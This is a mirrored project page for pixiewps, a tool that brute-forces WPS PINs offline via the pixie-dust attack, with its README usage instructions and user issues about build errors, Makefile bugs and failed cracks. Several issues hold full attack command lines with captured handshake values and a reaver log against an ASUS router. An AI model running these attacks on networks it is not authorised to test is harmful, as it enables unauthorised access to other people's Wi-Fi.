Code Monkey home page Code Monkey logo

pixiewps's Introduction

Overview License

Pixiewps is a tool written in C used to bruteforce offline the WPS PIN exploiting the low or non-existing entropy of some software implementations, the so-called "pixie-dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only.

As opposed to the traditional online brute-force attack, implemented in tools like Reaver or Bully which aim to recover the pin in a few hours, this method can get the PIN in only a matter of seconds or minutes, depending on the target, if vulnerable.

pixiewps_screenshot_1

Since version 1.4, it can also recover the WPA-PSK from a complete passive capture (M1 through M7) for some devices (currently only some devices which work with --mode 3).

pixiewps_screenshot_2

It all started as a project from the community, more details can be found here:

You can also visit the wiki.

Requirements

apt-get -y install build-essential
  • Prior versions of 1.2 require libssl-dev
  • Versions 1.4 and later make use of multi-threading and require libpthread (POSIX threads)

OpenSSL has also been re-introduced as optional to achieve better speeds. See the Build section.

Setup

Download

git clone https://github.com/wiire/pixiewps

or

wget https://github.com/wiire/pixiewps/archive/master.zip && unzip master.zip

Build

cd pixiewps*/
make

Optionally, you can run make OPENSSL=1 to use faster OpenSSL SHA-256 functions.

Install

sudo make install

Usage

Usage: pixiewps <arguments>

Required arguments:

  -e, --pke         : Enrollee public key
  -r, --pkr         : Registrar public key
  -s, --e-hash1     : Enrollee hash 1
  -z, --e-hash2     : Enrollee hash 2
  -a, --authkey     : Authentication session key
  -n, --e-nonce     : Enrollee nonce

Optional arguments:

  -m, --r-nonce     : Registrar nonce
  -b, --e-bssid     : Enrollee BSSID
  -v, --verbosity   : Verbosity level 1-3, 1 is quietest           [3]
  -o, --output      : Write output to file
  -j, --jobs        : Number of parallel threads to use         [Auto]

  -h                : Display this usage screen
  --help            : Verbose help and more usage examples
  -V, --version     : Display version

  --mode N[,... N]  : Mode selection, comma separated           [Auto]
  --start [mm/]yyyy : Starting date             (only mode 3) [+1 day]
  --end   [mm/]yyyy : Ending date               (only mode 3) [-1 day]
  -f, --force       : Bruteforce full range     (only mode 3)

Miscellaneous arguments:

  -7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)
  -5, --m5-enc      : Recover secret nonce from M5       (only mode 3)

Usage example

The most common usage example is:

pixiewps --pke ... --pkr ... --e-hash1 ... --e-hash2 ... --authkey ... --e-nonce ...

which requires a modified version of Reaver or Bully which prints the Authentication Session key (--authkey, -a). The recommended version is reaver-wps-fork-t6x.

The program has also a man page and a verbose help screen (--help) with more examples.

-S, --dh-small

This feature was introduced back in Reaver 1.3. It works by choosing the private key = 1, thus resulting in having the public key --pkr = 2. This speeds up the cracking process since the AP must do less computations to calculate the Diffie-Hellman shared secret, which is later used to derive the session keys that encrypt the current transaction. Pixiewps can exploit this feature so that the user doesn't have to input --pkr (it's always 2) and optionally compute the session keys, like --authkey, if additional arguments, --r-nonce and --bssid, are specified.

It turns out some routers are buggy and do not function correctly with this feature. Some won't even be able to validate the correct PIN and the transaction will fail after M4. For this reason this feature is deprecated and should never be used in Reaver.

-7, --m7-enc

This option requires the attribute encrypted settings found in M7 when the Registrar proved knowledge of the PIN, and the Access Points, the Enrollee, sends its current network configuration.

This feature can be used to crack the WPA-PSK (and WPS PIN) from a passive packet capture (e.g. sniffing a PBC session).

-f, --force

This option is used only for mode 3. When used pixiewps will start bruteforcing from the current time and go back all the way to 0. It is conceptually identical to using --end 01/1970 only (or --start 01/1970 since they're interchangeable).

Empty PIN

The empty PIN, denoted with <empty> can be tested with -p "" in Reaver 1.6.1 and later. It comes from a misconfiguration of the PIN method on some Access Points which have the PIN variable set to NULL (or empty string).

pixiewps_screenshot_3

Supported platforms

Pixiewps can be compiled for a wide variety of platforms. On Windows it can be compiled with MinGW. Be sure to have installed phtread support.

Since version 1.4.1 it has been included in OpenWrt and LEDE official repositories.

Versioning convention

The version numbering is in the form 1.x.y, where x usually indicates a major release, and y a minor release, typically bug fixing or other small changes. Every major release starts with y = 0 and should be considered unstable in the first hours of publishing, even if not marked as such.

For a list of changes between one release and the previous refer to CHANGELOG.

Notes for wrappers and scripts

  • The data in input can be formatted with one of the following byte separators: ':', '-', ' ', or without
  • The most useful tags like WPS pin and WPA-PSK are denoted with [+] or [-] in case of failure
  • Pixiewps returns 0 on a successful attempt
  • An option that has been deprecated means that it shouldn't be used anymore and may get removed on a later release

Contributing

Since the very first release pixiewps has improved a lot, but it's hard to keep track of every device on the market. We have decided to add an automatic message suggesting that we are interested in the parameters of the device tested by the user.

Acknowledgements

  • Part of the code was inspired by Bully by Brian Purcell
  • The crypto and bignum libraries were taken from LibTomCrypt and TomsFastMath
  • Endianness detection and conversion is from rofl0r/endianness.h
  • See contributors for a list of everyone that has contributed
  • Huge thanks to kcdtv, rofl0r and binarymaster for helping and testing
  • Special thanks to soxrok2212, datahead, t6_x, aanarchyy and the Kali Linux community

References

Pixiewps is based on the work of Dominique Bongard (@Reversity):

pixiewps's People

Contributors

binarymaster avatar drygdryg avatar marchrius avatar rofl0r avatar samueloph avatar wiire-a avatar wpa2 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

pixiewps's Issues

Uninstall target seems broken

Since 1.2 we install executable in LOCDIR (/usr/local/bin) but uninstall target in Makefile removes executable from BINDIR (/usr/bin).

Failed to recover pin due to sudden time update in the middle of a transaction (mode 3)

We found a set of data for which it was possible to recover the seed, but not the pin:

pixiewps --pke d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b --pkr 5875393c477427c90abee5900e6425c6067d7bf6171ec55e33e3bcba1a41c12bcaa4ea5d78a45cbddcafe0f21e3182846df23a9695a327a5e132139fee1c920494ddb56c7ebdab538de23ec2a1f0435ade49be8c8ccb250c04280d7da9d57c11d3dd99dc108d965789153d6b5c905fc4c1be19404b9326564530fe5f3b49e606c904fee316affebf0d7b4dd0d757064307d77ff7d0c4c8015331dc88a0f7841a91523f164403647f805d49e01844a8ee60f1dcb6073c2fd3e3287089665e6509 --e-hash1 076477c4a43c3f282da4d76daf288498e140341cb7d8fa7b027f31f6afffec75 --e-hash2 131008071141b2bbeb4931452394c4507bced0ad9c4454443d89b438e92a19ec --authkey 85daddc08206e59f4ecc86228e0166191fe273fae50d72d011641e78c8a11e51 --e-nonce 31223dd87acdfbb32b8ca34a6fd08981 --force

After some digging I found out that the time between the plaintext nonce and the secret nonces was of 12 seconds apart. This is most likely due to a sudden time update after a NTP query.

To overcome this problem a small window of seeds forward in time and one backwards (clocks can skew in either direction), should be tested for E-S1 and E-S2. Currently, such window exists but only in the future for a small number of seconds:

#define MODE3_TRIES 3

This is not a bug, rather something not taken into consideration in earlier versions.

Thanks to @rofl0r for testing and finding this.

OS X El Capitan problem..

Hi... this what happen when i try "make"

cc -std=c99 -O3 -Wno-deprecated-declarations -o pixiewps pixiewps.c random_r.c -lcrypto
In file included from pixiewps.c:51:
./pixiewps.h:66:10: fatal error: 'openssl/sha.h' file not found

include <openssl/sha.h>

     ^

1 error generated.
make: *** [all] Error 1


can you help me? already brew install openssl/libressl, still cant figure out why...
i try "mdfind sha.h"

/usr/local/Cellar/libressl/2.3.0_1/include/openssl/sha.h
/usr/local/Cellar/openssl/1.0.2d_1/include/openssl/sha.h
/usr/include/php/ext/hash/php_hash_sha.h
/usr/include/php/ext/hash/php_hash_md.h

thanks....

Problem in 'make' procedure for Ubuntu

I use Ubuntu 15.04 and I just download the source. When I try to 'make' the program I get the following errors:

cc -std=c99 -O3 -Wno-deprecated-declarations -o pixiewps pixiewps.c random_r.c -lcrypto -I../include
In file included from pixiewps.c:57:0:
pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
 #include <openssl/sha.h>
                         ^
compilation terminated.
In file included from random_r.c:25:0:
../include/features.h:256:0: warning: "__STDC_IEC_559__" redefined
 #define __STDC_IEC_559__  1
 ^
In file included from <command-line>:0:0:
/usr/include/stdc-predef.h:38:0: note: this is the location of the previous definition
 #  define __STDC_IEC_559__  1
 ^
In file included from random_r.c:25:0:
../include/features.h:257:0: warning: "__STDC_IEC_559_COMPLEX__" redefined
 #define __STDC_IEC_559_COMPLEX__ 1
 ^
In file included from <command-line>:0:0:
/usr/include/stdc-predef.h:46:0: note: this is the location of the previous definition
 #  define __STDC_IEC_559_COMPLEX__ 1
 ^
In file included from random_r.c:25:0:
../include/features.h:259:0: warning: "__STDC_ISO_10646__" redefined
 #define __STDC_ISO_10646__  200009L
 ^
In file included from <command-line>:0:0:
/usr/include/stdc-predef.h:54:0: note: this is the location of the previous definition
 #define __STDC_ISO_10646__  201103L
 ^
Makefile:11: recipe for target 'all' failed
make: *** [all] Error 1

I think the problem is in crypto parameter of the cc compiler but I don't know what to replace to work.

Installing problem

I can't install pixiewps. I get this error when I type "make" in its src directory.

gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
pixiewps.c:33:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make: * [all] Error 1

I'm using the latest version.

Fresh build of pixiewps hangs at --start 01/1970 --end 04/1970

Testing this:

pixiewps -e D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B -s 2847F291C47CCB6C0BDE8BB0136DA95952F3FFFD1359F252ED9C65F2984ADB22 -z 70E46A69057CA66B7A7A0F84E7629A78F955C87D6201B6C6D7A4BFB1C55D61B7 -a 1EDA2AC414BBAA0BB48AFBFCBE119944647C604593DD02D802EE1E3D28E2D46C -n 2BECDC9A5587370B75766F5D5EE88F4A -r 2FF48A1F2471BED45710572615264E15AC834C1AEDAA7DF76E128850F4AA8FD5C4EEC360E2D36132C6187743C292EE7E805285C51AFA53137966ECB59D87804022200ACC985F5481D2D2179F1C43755EAE04E63D91D8DFD7D5B7FD378632E48B1DA4D45E06EDB9B03CFF18BEED3BDC3B3F6BC6FBCABCECF6A33137ED0BD8297A1333B6166C76CBE22D5E8792BCA05B8B10B940DB024DAD43A7DAF14F357333E5CA49D525B1A6383A77A48E479D6B80EAF3DFFBC2D373463F5BB48F590BD87F13 --start 01/1970 --end 04/1970

I know that seed is actually in 2015, but before 7db5fd8 it doesn't hang with these args.

Expected result would be:

 [-] WPS pin not found!

 [*] Time taken: 1 s 201 ms

 [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

makefile bug: $(DESTDIR) used twice in install.

From src/Makefile:

PREFIX = $(DESTDIR)/usr
LOCDIR = $(PREFIX)/local/bin

install -m 755 $(TARGET) $(DESTDIR)$(LOCDIR) evals to this on my system:
install -m 755 pixiewps /var/tmp/portage/net-wireless/pixiewps-1.2.2/image//var/tmp/portage/net-wireless/pixiewps-1.2.2/image//usr/local/bin

As you can see from the above, $(DESTDIR) is used twice.

Makefile

Bug in src/Makefile, lines 17 and 18

17 install -d $(DESTDIR)$(BINDIR)
18 install -m 755 $(TARGET) $(DESTDIR)$(BINDIR)

BINDIR already includes DESTDIR, because BINDIR includes RPEFIX and PREFIX includes DESTDIR:

6 PREFIX ?= $(DESTDIR)/usr
7 BINDIR = $(PREFIX)/bin

so the result is as follows:
install -d $(DESTDIR)$(DESTDIR)/usr/bin

Fix it please.

RTL819x and Small DH keys

Hello wiire! Can you explain please why you are blocking the RTL819x algorithm for Small DH keys?

if (wps->small_dh_keys || check_small_dh_keys(wps->pkr)) {
...
snprintf(wps->warning, 256, " [!] Small DH keys is not supported for mode %u!\n\n", RTL819x);

searching the keyspace with --force requires -e nonce?

Hi wiire,

When users are redirected to using --force ("AP might be vulnerable"), the option will apparently not take effect unless an e-none is passed (line 334 and 369 in pixiewps.c). This makes sense given that the parameters detected by reaver are required to bruteforce the key space, but it is not documented and very confusing given that the e-nonce is stated as being optional.

Also, pixiewps stop the key search after about 2 seconds when --force is passed. It would be incredibly helpful to get feedback as to why. Could this be implemented?

Cheers,

ichrispa

Anyone know about Dumpper

Please tell me anyone about Dumpper v.80.9. Does it gives the correct wps pin or its just a joke.
kali8

is this even compatible to mac os x ?

Hey,

Sorry if the question seems anyway rude the problem i have been trying for good part of day reading articles, forum post to install this my macbook pro osx 10.9.5 ,but i keep hitting a dead end.

Among my failures are apt-get and yum they don't seem respond to the commands long after configuring and installing them.

                                                                                                                                        --help , please?!!    

When I `make`, the `make: *** No rule to make target '/package.mk'. Stop.`

The make output:

Makefile:1: /rules.mk: No such file or directory
Makefile:7: /package.mk: No such file or directory
make: *** No rule to make target '/package.mk'. Stop.

My operating system is Linux 4.4.0-22-generic #39-Ubuntu SMP Thu May 5 16:53:32 UTC 2016 GNU/Linux, and Ubuntu 16.04 LTS, what's the problem when I make?

pixiewps

Hack Wifi whit aircrack and reavers

Unable to compile

Hi, I'm using Kali Linux 2016.2, I'm trying to install v1.1 of pixiewps and getting error as follows:


root@pegasus:~/Downloads/pixiewps-1.1/src# make
gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
In file included from pixiewps.c:51:0:
pixiewps.h: In function ‘hmac_sha256’:
pixiewps.h:138:11: error: storage size of ‘ctx’ isn’t known
  HMAC_CTX ctx;
           ^~~
pixiewps.h:139:2: warning: implicit declaration of function ‘HMAC_CTX_init’ [-Wimplicit-function-declaration]
  HMAC_CTX_init(&ctx);
  ^~~~~~~~~~~~~
pixiewps.h:143:2: warning: implicit declaration of function ‘HMAC_CTX_cleanup’ [-Wimplicit-function-declaration]
  HMAC_CTX_cleanup(&ctx);
  ^~~~~~~~~~~~~~~~
Makefile:10: recipe for target 'all' failed
make: *** [all] Error 1

Can you help? Am I doing something wrong please?

--force doesn't print anything to stdout/stderr when not successful ?

just got a force run that took over half an hour, and it just silently exited after that, without printing anything. due to that, i was unsure if i might have run into a bug.
when i used --start=06/2001 --end=01/2000 instead, it printed (as expected) a message that the pin was not found.

consider new release tag

Hey, it seems the version is static for quite a while and no crazy amount of bug reports came back, so maybe its time to tag a new release picking up the newest commits with mode and DESTDIR changed etc?

would be awesome,
cheers

Division by zero warning, might be a fluke

FreeBSD compile reports this warning:

gmake[1]: Entering directory '/wrkdirs/usr/ports/security/pixiewps/work/pixiewps-1.2.1/src'
cc -std=c99 -O3 -o pixiewps pixiewps.c random_r.c crypto/sha256.c crypto/md.c crypto/md_wrap.c
pixiewps.c:790:52: warning: division by zero is undefined [-Wdivision-by-zero]
        unsigned long long ms_elapsed = (c_end - c_start) / (CLOCKS_PER_SEC / 1000);

I know it's not critical, but other than that, all compiler warnings from clang are gone 👍

wps not found!

Hmmm's any help plssss???

root@Kerj:~# time reaver -i wlan0mon -b **:**:**:**:**:** -c 10 -vvv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan0mon to channel 10
[?] Restore previous session for **:**:**:**:**:**? [n/Y] n
[+] Waiting for beacon from **:**:**:**:**:**
[+] Associated with **:**:**:**:**:** (ESSID: *******)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 50:b8:38:9e:82:5d:3e:21:a3:15:d6:ae:24:86:d1:58
[P] PKE: de:61:24:54:ed:42:29:8f:dd:47:52:05:41:6a:8b:a4:e0:7d:43:d8:39:8c:d0:80:94:6d:f7:64:f5:7c:72:bc:f6:30:d7:fc:b1:a7:b0:35:92:61:48:a2:f0:2d:2f:5e:4d:64:48:0c:dc:f5:47:04:ee:b4:6f:36:94:33:d6:96:14:af:cc:df:6d:8f:2b:5f:5d:a5:76:35:fb:70:f8:e2:b3:c4:6a:0a:9c:3f:43:15:c1:ad:4f:c0:f6:47:08:a9:bd:63:af:79:c5:c4:4c:5e:a2:0b:77:d9:a2:e9:f6:34:10:50:08:f1:ec:57:6c:4e:16:f9:79:70:8d:96:70:13:aa:7e:8e:67:06:e4:34:c6:c8:7e:df:58:87:0f:33:97:00:6b:2e:bc:7f:18:d2:f4:d9:46:3c:30:9d:26:7e:b9:94:25:5e:df:80:bd:a0:09:99:28:46:1a:e6:9c:f2:3f:a4:84:4e:b5:94:67:5f:76:f9:79:2f:b7:88:f5:39:d0
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: WPS Router
[P] WPS Model Number: RT-AC51U
[P] Access Point Serial Number: 00000000
[+] Received M1 message
[P] R-Nonce: b8:fc:ad:1e:6d:f3:8d:11:a7:d3:c7:d5:75:c8:22:1f
[P] PKR: 77:b0:82:e3:12:ac:cb:15:c5:63:86:48:a7:4e:42:42:5b:ab:c4:32:1f:f7:c5:1f:77:46:c0:a7:87:9e:4c:cf:ed:df:7e:df:1e:20:b9:e0:5b:e9:fc:ff:b9:73:95:38:18:cb:83:42:d9:ba:e3:90:cb:04:25:ef:ee:a9:de:ca:63:f7:0b:bc:3c:eb:7a:19:89:6b:0d:87:41:f8:df:b1:b8:37:bb:b8:6f:48:87:0e:90:66:35:bb:df:c7:e5:89:d4:e0:fb:cc:91:2b:32:f0:43:d6:4d:4e:2f:1a:c5:f7:b5:37:5c:ea:5a:36:f6:00:56:a4:de:4c:79:88:4d:4d:35:13:87:bc:0f:23:20:99:75:39:ff:0b:c8:c9:4e:71:7e:1f:8f:17:50:6c:c3:0c:71:c6:bf:a4:18:53:65:6a:79:30:af:d4:9a:3d:5f:9d:36:40:99:1f:f7:11:7e:6c:b6:ed:a5:c2:8f:0e:10:1a:77:71:83:77:d7:ea:96:d5
[P] AuthKey: 31:6f:99:12:5b:0f:04:13:6e:1c:76:8e:ae:da:7d:e4:9c:fc:e5:bb:96:d1:bf:44:10:ca:f3:9d:35:6e:8c:a5
[+] Sending M2 message
[P] E-Hash1: 53:04:b1:66:68:81:33:c1:3f:f6:b0:e6:b0:7a:86:0f:bd:14:69:07:8d:a2:62:fa:bb:9e:4b:d7:e5:3f:fe:2d
[P] E-Hash2: af:bc:ee:08:0f:95:02:d4:27:a1:a1:9f:65:0f:9c:22:62:05:2e:52:5c:fc:e8:3b:43:ce:b0:6f:82:e8:07:1e
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 1 s
[Pixie-Dust]  

real 0m11.518s
user 0m0.872s
sys  0m0.236s

Seed found but no PIN shown

In some cases Pixiewps successfully recovers the seed but the PIN is not found.

Original issue opened here: t6x/reaver-wps-fork-t6x#35

This is more likely to happen on low end devices with small computational power, especially if far from the Access Point, and it's easy to spot:

First run Pixiewps without --force (-f). If the following message is shown:

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

run it again with --force (-f) and you will see it exits before completing the full bruteforce (e.g. if it usually takes 20 - 30 minutes to complete, but stops just after 1 - 3 minutes).

Wrong output:

pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -r 631cf02e22f5949b78c93e063c0d566c86b839c157dd43f0ebb1385b3fbb8beb89ca502b99e45ddafdc9949db8074c4d99bbad43c60ac1a633f7137dfcc64d70234ca40a342cfa64241010c46a7dcd1930b6149f11df44cb8350401f7d090dbf9c9858c6ec1c2c2816299f2cea4f204e390e232454ffdd4d977746d652b8aef6d14e317b0a8c43e647c7613444faf8a50e3f6639a200664a4058365b829fb942d6aba9c0e341712faffc3612f2df1e70e66dfb6c18c52af1b6818d0cbd2195fd -s bd677a7d1a84825189d14f8d4243ffb18cceb24dab8634b9ca0e8275b84c8bda -z 3991659d3a4deb9f7a23fd03c5dfb6a9d78e28cb48736ed32171b579c40d3014 -a da21fca948ae9d14fdc3ba31b12f4e7bbe87f7e651be6c7a57c4becc3ef93f28 -n 0a572db8608d8b7519a030946960ef41

 Pixiewps 1.1

 [-] WPS pin not found!

 [*] Time taken: 0 s 841 ms

 [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

After --force:

 Pixiewps 1.1

 [-] WPS pin not found!

 [*] Time taken: 1 s 289 ms

Correct output:

pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -r 631cf02e22f5949b78c93e063c0d566c86b839c157dd43f0ebb1385b3fbb8beb89ca502b99e45ddafdc9949db8074c4d99bbad43c60ac1a633f7137dfcc64d70234ca40a342cfa64241010c46a7dcd1930b6149f11df44cb8350401f7d090dbf9c9858c6ec1c2c2816299f2cea4f204e390e232454ffdd4d977746d652b8aef6d14e317b0a8c43e647c7613444faf8a50e3f6639a200664a4058365b829fb942d6aba9c0e341712faffc3612f2df1e70e66dfb6c18c52af1b6818d0cbd2195fd -s bd677a7d1a84825189d14f8d4243ffb18cceb24dab8634b9ca0e8275b84c8bda -z 3991659d3a4deb9f7a23fd03c5dfb6a9d78e28cb48736ed32171b579c40d3014 -a da21fca948ae9d14fdc3ba31b12f4e7bbe87f7e651be6c7a57c4becc3ef93f28 -n 0a572db8608d8b7519a030946960ef41

 Pixiewps 1.1

 [*] PRNG Seed:  1441253945 (Thu Sep  3 06:19:05 2015)
 [*] PSK1:       a3:60:fc:38:36:63:52:2c:98:c7:24:16:09:83:b2:25
 [*] PSK2:       2f:4d:af:58:cf:04:cb:0d:d2:a7:03:3f:94:c9:61:95
 [*] E-S1:       64:d7:17:a1:08:e2:a1:9f:25:cf:9b:67:79:db:b4:e6
 [*] E-S2:       64:d7:17:a1:08:e2:a1:9f:25:cf:9b:67:79:db:b4:e6
 [+] WPS pin:    14987236

 [*] Time taken: 0 s 731 ms

unable to build since rencent changes

I used to build pxieview on my fedora26 system but since recently, not able to anymore :

[sheepdestroyer@sheepora-X230 pixiewps]$ cd src/
[sheepdestroyer@sheepora-X230 src]$ make
cc -O2 -pipe -march=native  -o pixiewps pixiewps.c random_r.c mbedtls/sha256.c mbedtls/md.c mbedtls/md_wrap.c -lpthread 
In file included from random_r.c:40:0:
random_r.h:26:8: error: redefinition of ‘struct random_data’
 struct random_data {
        ^~~~~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:320:8: note: originally defined here
 struct random_data
        ^~~~~~~~~~~
In file included from random_r.c:40:0:
random_r.h:36:6: error: conflicting types for ‘random_r’
 void random_r(struct random_data *buf, int32_t *result);
      ^~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:331:12: note: previous declaration of ‘random_r’ was here
 extern int random_r (struct random_data *__restrict __buf,
            ^~~~~~~~
In file included from random_r.c:40:0:
random_r.h:37:5: error: conflicting types for ‘srandom_r’
 int srandom_r(unsigned int seed, struct random_data *buf);
     ^~~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:334:12: note: previous declaration of ‘srandom_r’ was here
 extern int srandom_r (unsigned int __seed, struct random_data *__buf)
            ^~~~~~~~~
In file included from random_r.c:40:0:
random_r.h:38:5: error: conflicting types for ‘initstate_r’
 int initstate_r(unsigned int seed, char *arg_state, size_t n, struct random_data *buf);
     ^~~~~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:337:12: note: previous declaration of ‘initstate_r’ was here
 extern int initstate_r (unsigned int __seed, char *__restrict __statebuf,
            ^~~~~~~~~~~
In file included from random_r.c:40:0:
random_r.h:39:5: error: conflicting types for ‘setstate_r’
 int setstate_r(char *arg_state, struct random_data *buf);
     ^~~~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:342:12: note: previous declaration of ‘setstate_r’ was here
 extern int setstate_r (char *__restrict __statebuf,
            ^~~~~~~~~~
random_r.c:145:6: error: conflicting types for ‘random_r’
 void random_r(struct random_data *buf, int32_t *result)
      ^~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:331:12: note: previous declaration of ‘random_r’ was here
 extern int random_r (struct random_data *__restrict __buf,
            ^~~~~~~~
random_r.c:203:5: error: conflicting types for ‘srandom_r’
 int srandom_r (unsigned int seed, struct random_data *buf)
     ^~~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:334:12: note: previous declaration of ‘srandom_r’ was here
 extern int srandom_r (unsigned int __seed, struct random_data *__buf)
            ^~~~~~~~~
random_r.c:271:5: error: conflicting types for ‘initstate_r’
 int initstate_r (unsigned int seed, char *arg_state, size_t n, struct random_data *buf)
     ^~~~~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:337:12: note: previous declaration of ‘initstate_r’ was here
 extern int initstate_r (unsigned int __seed, char *__restrict __statebuf,
            ^~~~~~~~~~~
random_r.c:330:5: error: conflicting types for ‘setstate_r’
 int setstate_r (char *arg_state, struct random_data *buf)
     ^~~~~~~~~~
In file included from random_r.c:27:0:
/usr/include/stdlib.h:342:12: note: previous declaration of ‘setstate_r’ was here
 extern int setstate_r (char *__restrict __statebuf,
            ^~~~~~~~~~
make: *** [Makefile:12: all] Error 1
[sheepdestroyer@sheepora-X230 src]$ 

OpenWrt Makefile?

Hi there,
could you please put the Makefile for the OpenWrt becouse i'm having problem with writing it.
Thank you in advance.

Implementation on Wemos D1 mini pro

Is it possible to implement on esp8266 chip? Wemos D1 mini pro got 16MB of storage, supports monitor mode, has an external antenna connector, supports packet injection, it can be programmed through arduino IDE.

Can we get a new release?

I'd very much like to submit my FreeBSD port for pixiewps. If we can get a new release-version (say 1.2), i'd hold off on submitting until then.

Since you haven't pushed a new tag since May, this might be a good time :)

Thanks in advance for considering

broken Makefile

sorry, I'm lazy to fork it. Here is the patch:

--- Makefile.orig       2016-01-05 06:08:02.000000000 +0800
+++ Makefile    2016-05-25 13:41:02.008984971 +0800
@@ -3,9 +3,8 @@
 TARGET = pixiewps
 CRYPTO = crypto/sha256.c crypto/md.c crypto/md_wrap.c
 SOURCE = $(TARGET).c random_r.c $(CRYPTO)
-PREFIX = $(DESTDIR)/usr
+PREFIX = /usr/local
 BINDIR = $(PREFIX)/bin
-LOCDIR = $(PREFIX)/local/bin

 all:
        $(CC) $(CCFLAGS) -o $(TARGET) $(SOURCE)
@@ -14,10 +13,8 @@
        $(CC) $(CCFLAGS) -DDEBUG -o $(TARGET) $(SOURCE)

 install:
-       rm -f $(BINDIR)/$(TARGET)
-       rm -f $(LOCDIR)/$(TARGET)
-       install -d $(DESTDIR)$(LOCDIR)
-       install -m 755 $(TARGET) $(DESTDIR)$(LOCDIR)
+       install -d $(DESTDIR)$(BINDIR)
+       install -m 755 $(TARGET) $(DESTDIR)$(BINDIR)

 uninstall:
        rm $(BINDIR)/$(TARGET)

Pin not found!

